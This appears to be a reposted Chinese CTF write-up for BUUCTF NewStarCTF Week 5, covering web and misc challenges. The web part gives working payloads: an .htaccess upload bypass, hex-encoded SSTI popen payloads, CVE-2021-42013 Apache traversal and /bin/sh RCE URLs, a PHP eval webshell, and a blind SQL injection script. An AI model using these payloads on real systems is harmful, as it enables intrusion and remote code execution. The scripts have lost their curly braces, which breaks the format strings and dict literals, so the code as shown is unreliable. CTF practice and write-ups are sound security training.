BUUCTF NewStarCTF 公开赛赛道Week5 Writeup
Posted 末初mochu7
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF NewStarCTF 公开赛赛道Week5 Writeup相关的知识,希望对你有一定的参考价值。
文章目录
WEB
Give me your photo PLZ
可上传.htaccess
AddType application/x-httpd-php .jpg
然后上传一个附加了一句话木马的图片,然后访问即可当作php文件解析
BabySSTI_Three
之前用的是字符串逆序绕过,这里过滤了:
,然后用十六进制绕过即可
def hex_payload(payload):
res_payload = ''
for i in payload:
i = "\\\\x" + hex(ord(i))[2:]
res_payload += i
print('[+]"" Convert to hex: ""'.format(payload,res_payload))
if __name__ == '__main__':
payload = "__class__"
hex_payload(payload)
''['\\x5f\\x5f\\x63\\x6c\\x61\\x73\\x73\\x5f\\x5f']['\\x5f\\x5f\\x62\\x61\\x73\\x65\\x73\\x5f\\x5f'][0]
''['\\x5f\\x5f\\x63\\x6c\\x61\\x73\\x73\\x5f\\x5f']['\\x5f\\x5f\\x62\\x61\\x73\\x65\\x73\\x5f\\x5f'][0]['\\x5f\\x5f\\x73\\x75\\x62\\x63\\x6c\\x61\\x73\\x73\\x65\\x73\\x5f\\x5f']()
''['\\x5f\\x5f\\x63\\x6c\\x61\\x73\\x73\\x5f\\x5f']['\\x5f\\x5f\\x62\\x61\\x73\\x65\\x73\\x5f\\x5f'][0]['\\x5f\\x5f\\x73\\x75\\x62\\x63\\x6c\\x61\\x73\\x73\\x65\\x73\\x5f\\x5f']()[117]['\\x5f\\x5f\\x69\\x6e\\x69\\x74\\x5f\\x5f']['\\x5f\\x5f\\x67\\x6c\\x6f\\x62\\x61\\x6c\\x73\\x5f\\x5f']['\\x70\\x6f\\x70\\x65\\x6e']('id').read()
''['\\x5f\\x5f\\x63\\x6c\\x61\\x73\\x73\\x5f\\x5f']['\\x5f\\x5f\\x62\\x61\\x73\\x65\\x73\\x5f\\x5f'][0]['\\x5f\\x5f\\x73\\x75\\x62\\x63\\x6c\\x61\\x73\\x73\\x65\\x73\\x5f\\x5f']()[117]['\\x5f\\x5f\\x69\\x6e\\x69\\x74\\x5f\\x5f']['\\x5f\\x5f\\x67\\x6c\\x6f\\x62\\x61\\x6c\\x73\\x5f\\x5f']['\\x70\\x6f\\x70\\x65\\x6e']('tail$IFS/fl*').read()
有了命令执行之后还需要有点绕过即可读取到flag
Unsafe Apache
这个版本有一个在CVE-2021-41773/Apache2.4.49 HTTP Server 路径穿越漏洞 原漏洞修复不完整导致的CVE(CVE-2021-42013)
/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
可命令执行
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;ls -lha /
So Baby RCE Again
?cmd=ls -lha / > 1.txt
SUID
提权:find / -perm -u=s -type f 2>/dev/null > ./1.txt
写入一句话木马
?cmd=echo '<?php @eval($_POST[7]); ?>' > mochu7.php
蚁剑连接,date -f
读取
Final round
延时盲注
直接脚本跑
import requests
import time
myurl = 'http://f7a282ac-9041-48a6-b86a-5bbe042f7035.node4.buuoj.cn:81/comments.php'
myheaders = "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
"Connection": "close", "Upgrade-Insecure-Requests": "1"
content = ''
for pos in range(500):
min_num = 32
max_num = 126
mid_num = (min_num + max_num) // 2
while (min_num < max_num):
payload = 'name=if(ord(mid((select(group_concat(text))from(wfy.wfy_comments)),,1))>,sleep(0.2),100)'.format(pos, mid_num)
resp = requests.post(url=myurl, headers=myheaders, data=payload)
resp_time = resp.elapsed.total_seconds()
if resp_time > 2:
min_num = mid_num + 1
else:
max_num = mid_num
mid_num = ((min_num + max_num) // 2)
content += chr(min_num)
print(content)
延时盲注时间太长,不建议重0开始跑,可以根据之前的几周的这道题的flag具体在哪个位置开始跑,缩短时间
MISC
最后的流量分析
简单的盲注流量分析
当响应包的长度>765
时,该条查询语句正确,tshark
导出查询语句和查询正确的判断条件(包长度)
tshark -r sqli.pcap -T fields -Y "http.request.method==GET or frame.len>765" -e "frame.len" -e "http.request.uri.query.parameter" > data.txt
Python简单处理
from urllib.parse import *
import re
comment = ''
with open('data.txt') as f:
lines = f.readlines()
for i in range(len(lines)):
if int(lines[i][:3])>765:
comment += re.findall(r'"(.)"', unquote(lines[i-1]))[0]
print(comment)
PS C:\\Users\\Administrator\\Downloads> python .\\code.py
flagc84bb04a-8663-4ee2-9449-349f1ee83e11
奇怪的PDF 2
strange2.pdf.lnk
发现大量Base64
Python脚本简单提取
with open('strange2.pdf.lnk', 'rb') as f:
f.seek(0x8d8)
with open('data.txt', 'wb') as f1:
f1.write(f.read(0x160424-0x8d8))
提取之后发现有两行Base64,尝试解码了头部一段发现是.cab
文件,且第一行的得到的.cab
文件有点问题打不开,第二行的解码得到可以正常打开
from base64 import *
with open('data.txt') as f:
lines = f.readlines()
with open('2.cab', 'wb') as f1:
f1.write(b64decode(lines[1]+'=='))
选择一个文件夹提取出来即可,得到flag
flagIt_1s_a_fak3_but_r3al_PDF
奇怪的文本
task.txt
猜测字频
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()\\_+-/=[] "#所有正常打印字符
strings = open('./task.txt').read()#读取需要统计频数的文本
result =
for i in alphabet:
counts = strings.count(i)
i = '0'.format(i)
result[i] = counts
res = sorted(result.items(), key=lambda item: item[1], reverse=True)
num = 0
for data in res:
num += 1
print('频数第0: 1'.format(num, data))
print('\\n---------------以下是频数从多到少的字符,按照从前到后排序---------------')
for i in res:
flag = str(i[0])
print(flag[0], end="")
---------------以下是频数从多到少的字符,按照从前到后排序---------------
flagS0B48yCAtipk91v[_bcdehjmnoqrsuwxzDEFGHIJKLMNOPQRTUVWXYZ23567!@#$%^&*()\\+-/=]
Yesec no drumsticks 5
PS C:\\Users\\Administrator\\Downloads\\Yesec_no_drumsticks_5> git stash pop
On branch master
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: flag.txt
no changes added to commit (use "git add" and/or "git commit -a")
Dropped refs/stash@0 (5d4b28bdf154e648d74e3836dd838beb77cec898)
PS C:\\Users\\Administrator\\Downloads\\Yesec_no_drumsticks_5> cat .\\flag.txt
flagYesec#1s#c@ibi
qsdz’s girlfriend 5
使用Winrar
解压,然后使用NTFStreamsEditor
得到密码,解压
Can_you_crack_steghide?
得到second_gf.jpg
,根据密码提示进行爆破,这里利用stegseek
以上是关于BUUCTF NewStarCTF 公开赛赛道Week5 Writeup的主要内容,如果未能解决你的问题,请参考以下文章
BUUCTF NewStarCTF 公开赛赛道Week5 Writeup
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup
BUUCTF NewStarCTF 公开赛赛道Week3 Writeup